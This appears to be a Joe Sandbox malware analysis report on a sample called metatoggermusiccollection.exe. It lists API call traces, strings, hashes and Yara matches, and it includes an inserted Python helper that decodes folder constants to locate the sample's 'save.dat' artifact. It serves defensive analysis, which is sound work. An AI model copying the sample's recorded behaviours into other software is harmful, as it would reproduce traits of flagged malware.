                                                                            • API String ID: 1765829285-0
                                                                            • Opcode ID: e866e427aa5de1f4ae65b97db395f79a073fc532ec717db83975a46da54e3b63
                                                                            • Instruction ID: 54165a46ed5929645f08615078f923c215a69579a7a886c0247b6e86426bace9
                                                                            • Opcode Fuzzy Hash: e866e427aa5de1f4ae65b97db395f79a073fc532ec717db83975a46da54e3b63
                                                                            • Instruction Fuzzy Hash: 78F05435A40110DFCB009FD4D8C8B88BBA4FF0D311F5081A9FB19DB290CB799855CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog_memmove
                                                                            • String ID: &'
                                                                            • API String ID: 3529519853-655172784
                                                                            • Opcode ID: ad90e95c7111bba2465a2c43198e6c875db2ac60cce0e9249c58fd9c925d62ee
                                                                            • Instruction ID: 9df862e49729e0caae82b3987542488345cf60fbee113322e095136c1fd9c09f
                                                                            • Opcode Fuzzy Hash: ad90e95c7111bba2465a2c43198e6c875db2ac60cce0e9249c58fd9c925d62ee
                                                                            • Instruction Fuzzy Hash: A9618E71D40219DFDF21DFA4CA80BEEBBB6AF48710F10416AD406AB181DF749A45CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCPInfo.KERNEL32(?,00000000), ref: 004056CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Info
                                                                            • String ID: $
                                                                            • API String ID: 1807457897-3032137957
                                                                            • Opcode ID: cf78403d1ad84891bd07750a5396902b39d4e3a867152e43ede0f354584f907c
                                                                            • Instruction ID: 09f2f023d99f136d6c1d54f1ac7197ff319f79a86c6e1a8e0271cc1bcc75f35e
                                                                            • Opcode Fuzzy Hash: cf78403d1ad84891bd07750a5396902b39d4e3a867152e43ede0f354584f907c
                                                                            • Instruction Fuzzy Hash: 474156310047586AEB15D614DE5DBFB7FA9EB02700F1400F6E946F71D2C2790924DFAA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02AD8306,?,?,00000000), ref: 02AD9603
                                                                            • getsockname.WS2_32(?,?,?), ref: 02AD9619
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLastgetsockname
                                                                            • String ID: &'
                                                                            • API String ID: 566540725-655172784
                                                                            • Opcode ID: 723d63950a27010ef93f18efb7996e4f64a23f0252f848309f1e0e451d1e5dcf
                                                                            • Instruction ID: 7c2d764a953e83937592303d178faa9acb066a7c5119b1f953d00ba3d7fb04fa
                                                                            • Opcode Fuzzy Hash: 723d63950a27010ef93f18efb7996e4f64a23f0252f848309f1e0e451d1e5dcf
                                                                            • Instruction Fuzzy Hash: 26215375A40208DBDB10DFA8D944ACEF7F5FF48314F11856AE919EB280DB34E9458B50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02ADCBE7
                                                                              • Part of subcall function 02ADD1C3: std::exception::exception.LIBCMT ref: 02ADD1F2
                                                                              • Part of subcall function 02ADD979: __EH_prolog.LIBCMT ref: 02ADD97E
                                                                              • Part of subcall function 02AE3A8F: _malloc.LIBCMT ref: 02AE3AA7
                                                                              • Part of subcall function 02ADD222: __EH_prolog.LIBCMT ref: 02ADD227
                                                                            Strings
                                                                            • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02ADCC24
                                                                            • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02ADCC1D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$_mallocstd::exception::exception
                                                                            • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                            • API String ID: 1953324306-1943798000
                                                                            • Opcode ID: 89e093cb15a74182ff57f9aaba8827bfc53ca591553b8bf6d0572a35080a97db
                                                                            • Instruction ID: bf5e36c9ad975c7efece11ac30da38ae9f513312b92d152cb8afb0ef42fd52c9
                                                                            • Opcode Fuzzy Hash: 89e093cb15a74182ff57f9aaba8827bfc53ca591553b8bf6d0572a35080a97db
                                                                            • Instruction Fuzzy Hash: B521CE71D41244AADB14EBE8DA54AAEFBB9EF18700F00048DE942A7280CF745A44CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02ADCCDC
                                                                              • Part of subcall function 02ADD29A: std::exception::exception.LIBCMT ref: 02ADD2C7
                                                                              • Part of subcall function 02ADDAB0: __EH_prolog.LIBCMT ref: 02ADDAB5
                                                                              • Part of subcall function 02AE3A8F: _malloc.LIBCMT ref: 02AE3AA7
                                                                              • Part of subcall function 02ADD2F7: __EH_prolog.LIBCMT ref: 02ADD2FC
                                                                            Strings
                                                                            • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02ADCD19
                                                                            • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02ADCD12
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$_mallocstd::exception::exception
                                                                            • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                            • API String ID: 1953324306-412195191
                                                                            • Opcode ID: 941bd4e6acd3723e6f2b2edf599475566bc30de3ffd5251ea3086b5ed8f8f41b
                                                                            • Instruction ID: 10237f59c393c775168920d333269c9e8c7826239d4c690876e1c623107fc316
                                                                            • Opcode Fuzzy Hash: 941bd4e6acd3723e6f2b2edf599475566bc30de3ffd5251ea3086b5ed8f8f41b
                                                                            • Instruction Fuzzy Hash: CD21A071E802489BDF04EFE8D994AADFBB5EF15700F10018DE946A7280DF749A44CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 02AD535D
                                                                              • Part of subcall function 02AE2EEC: __FF_MSGBANNER.LIBCMT ref: 02AE2F03
                                                                              • Part of subcall function 02AE2EEC: __NMSG_WRITE.LIBCMT ref: 02AE2F0A
                                                                              • Part of subcall function 02AE2EEC: RtlAllocateHeap.NTDLL(00780000,00000000,00000001), ref: 02AE2F2F
                                                                            • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 02AD536F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                            • String ID: \save.dat
                                                                            • API String ID: 4128168839-3580179773
                                                                            • Opcode ID: 86f3081f36beadeef0318135b5e2900bb412a3f063c7478388bb7be8f61dc3c0
                                                                            • Instruction ID: a8c566315e1001578c6ce9cb6288634fbd0e15c8ac545c22c946fd62d5371780
                                                                            • Opcode Fuzzy Hash: 86f3081f36beadeef0318135b5e2900bb412a3f063c7478388bb7be8f61dc3c0
                                                                            • Instruction Fuzzy Hash: C1113A729042447BEF229F658CD4A6FFF6BDF82750B5401E9E84667202DEB31D07CAA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%
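The SHGetSpecialFolderPathA call listed for this function passes 00000023 as its third argument (nFolder) and the same function carries the string "\save.dat", so the two together give the on-disk artifact the sample resolves at runtime. The decoder below is an added example for reading such trace lines; it is not part of the Joe Sandbox report or of the sample's code. The CSIDL constants are the documented shlobj.h values; the default folder paths are the usual ones for a single-drive English Windows install and are an assumption, since the sandbox image may map them elsewhere.

```python
"""Decode CSIDL constants in Joe Sandbox API-trace lines (added example)."""
import re
from typing import Dict, Optional, Tuple

# CSIDL values from shlobj.h. The default paths are an assumption
# (typical Windows install); resolve them on the target if it matters.
CSIDL: Dict[int, Tuple[str, str]] = {
    0x02: ("CSIDL_PROGRAMS", r"C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"),
    0x05: ("CSIDL_PERSONAL", r"C:\Users\<user>\Documents"),
    0x07: ("CSIDL_STARTUP", r"C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"),
    0x10: ("CSIDL_DESKTOPDIRECTORY", r"C:\Users\<user>\Desktop"),
    0x18: ("CSIDL_COMMON_STARTUP", r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"),
    0x1A: ("CSIDL_APPDATA", r"C:\Users\<user>\AppData\Roaming"),
    0x1C: ("CSIDL_LOCAL_APPDATA", r"C:\Users\<user>\AppData\Local"),
    0x23: ("CSIDL_COMMON_APPDATA", r"C:\ProgramData"),
    0x24: ("CSIDL_WINDOWS", r"C:\Windows"),
    0x25: ("CSIDL_SYSTEM", r"C:\Windows\System32"),
    0x26: ("CSIDL_PROGRAM_FILES", r"C:\Program Files"),
    0x28: ("CSIDL_PROFILE", r"C:\Users\<user>"),
    0x2A: ("CSIDL_PROGRAM_FILESX86", r"C:\Program Files (x86)"),
}
CSIDL_FLAG_CREATE = 0x8000  # high byte holds flags, low byte the folder id

# Matches the "SHGetSpecialFolderPathA.SHELL32(a,b,c,d), ref: XXXXXXXX" lines of the report.
API_LINE = re.compile(
    r"(?P<api>SHGetSpecialFolderPath[AW])\.SHELL32\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# The trace line and String ID taken from the report block above.
REPORT_LINE = "• SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 02AD536F"
REPORT_STRING_ID = r"\save.dat"


def decode_csidl(value: int) -> Tuple[str, str, bool]:
    """Return (constant name, assumed default path, CSIDL_FLAG_CREATE set)."""
    create = bool(value & CSIDL_FLAG_CREATE)
    base = value & 0xFF
    name, path = CSIDL.get(base, ("CSIDL_UNKNOWN_0x%02X" % base, "<unknown>"))
    return name, path, create


def parse_call(line: str) -> Optional[dict]:
    """Parse one SHGetSpecialFolderPath trace line; None if the line is something else."""
    m = API_LINE.search(line)
    if m is None:
        return None
    args = [a.strip() for a in m.group("args").split(",")]
    # nFolder is the third parameter: SHGetSpecialFolderPath(hwnd, pszPath, nFolder, fCreate).
    # The sandbox prints unresolved arguments as "?", which int() rejects.
    try:
        csidl = int(args[2], 16)
    except (IndexError, ValueError):
        return None
    name, path, create = decode_csidl(csidl)
    return {
        "api": m.group("api"),
        "ref": m.group("ref").upper(),
        "csidl": csidl,
        "name": name,
        "default_path": path,
        "create": create,
    }


def candidate_artifact(line: str, string_id: str) -> Optional[str]:
    """Join the decoded folder with the String ID the report lists for the same function."""
    info = parse_call(line)
    if info is None:
        return None
    return info["default_path"].rstrip("\\") + "\\" + string_id.lstrip("\\")


if __name__ == "__main__":
    print(parse_call(REPORT_LINE))
    print(candidate_artifact(REPORT_LINE, REPORT_STRING_ID))
```

For this block the decoder yields CSIDL_COMMON_APPDATA, so the string resolves to a file under the all-users application data directory. When the high byte of nFolder is set, the call also creates the folder; the decoder reports that separately because it changes what a file-system trace will show.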

                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe,00000104,?,00000000,?,?,?,?,00402FB0), ref: 004044E6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: FileModuleName
                                                                            • String ID: 6x$C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                            • API String ID: 514040917-879218402
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD396A
                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02AD39C1
                                                                              • Part of subcall function 02AD1410: std::exception::exception.LIBCMT ref: 02AD1428
                                                                              • Part of subcall function 02ADA551: __EH_prolog.LIBCMT ref: 02ADA556
                                                                              • Part of subcall function 02ADA551: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02ADA565
                                                                              • Part of subcall function 02ADA551: __CxxThrowException@8.LIBCMT ref: 02ADA584
                                                                            Strings
                                                                            • Day of month is not valid for year, xrefs: 02AD39AC
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                            • String ID: Day of month is not valid for year
                                                                            • API String ID: 1404951899-1521898139
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • std::exception::exception.LIBCMT ref: 02ADFA4A
                                                                            • __CxxThrowException@8.LIBCMT ref: 02ADFA5F
                                                                              • Part of subcall function 02AE3A8F: _malloc.LIBCMT ref: 02AE3AA7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                            • String ID: bad allocation
                                                                            • API String ID: 4063778783-2104205924
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD3C1B
                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 02AD3C30
                                                                              • Part of subcall function 02AE23F7: std::exception::exception.LIBCMT ref: 02AE2401
                                                                              • Part of subcall function 02ADA58A: __EH_prolog.LIBCMT ref: 02ADA58F
                                                                              • Part of subcall function 02ADA58A: __CxxThrowException@8.LIBCMT ref: 02ADA5B8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                            • String ID: bad cast
                                                                            • API String ID: 1300498068-3145022300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD3886
                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02AD38A5
                                                                              • Part of subcall function 02AD1410: std::exception::exception.LIBCMT ref: 02AD1428
                                                                              • Part of subcall function 02AD88BF: _memmove.LIBCMT ref: 02AD88DF
                                                                            Strings
                                                                            • Day of month value is out of range 1..31, xrefs: 02AD3894
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                            • String ID: Day of month value is out of range 1..31
                                                                            • API String ID: 3258419250-1361117730
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD38D2
                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02AD38F1
                                                                              • Part of subcall function 02AD1410: std::exception::exception.LIBCMT ref: 02AD1428
                                                                              • Part of subcall function 02AD88BF: _memmove.LIBCMT ref: 02AD88DF
                                                                            Strings
                                                                            • Year is out of valid range: 1400..10000, xrefs: 02AD38E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                            • String ID: Year is out of valid range: 1400..10000
                                                                            • API String ID: 3258419250-2344417016
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD391E
                                                                            • std::runtime_error::runtime_error.LIBCPMT ref: 02AD393D
                                                                              • Part of subcall function 02AD1410: std::exception::exception.LIBCMT ref: 02AD1428
                                                                              • Part of subcall function 02AD88BF: _memmove.LIBCMT ref: 02AD88DF
                                                                            Strings
                                                                            • Month number is out of range 1..12, xrefs: 02AD392C
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                            • String ID: Month number is out of range 1..12
                                                                            • API String ID: 3258419250-4198407886
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • TlsAlloc.KERNEL32 ref: 02AD19CC
                                                                            • GetLastError.KERNEL32 ref: 02AD19D9
                                                                              • Part of subcall function 02AD1712: __EH_prolog.LIBCMT ref: 02AD1717
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocErrorH_prologLast
                                                                            • String ID: tss
                                                                            • API String ID: 249634027-1638339373
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD3BD8
                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 02AD3BED
                                                                              • Part of subcall function 02AE23F7: std::exception::exception.LIBCMT ref: 02AE2401
                                                                              • Part of subcall function 02ADA58A: __EH_prolog.LIBCMT ref: 02ADA58F
                                                                              • Part of subcall function 02ADA58A: __CxxThrowException@8.LIBCMT ref: 02ADA5B8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                            • String ID: bad cast
                                                                            • API String ID: 1300498068-3145022300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 00403984
                                                                            • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039B8
                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039D2
                                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: AllocHeap$FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 3499195154-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%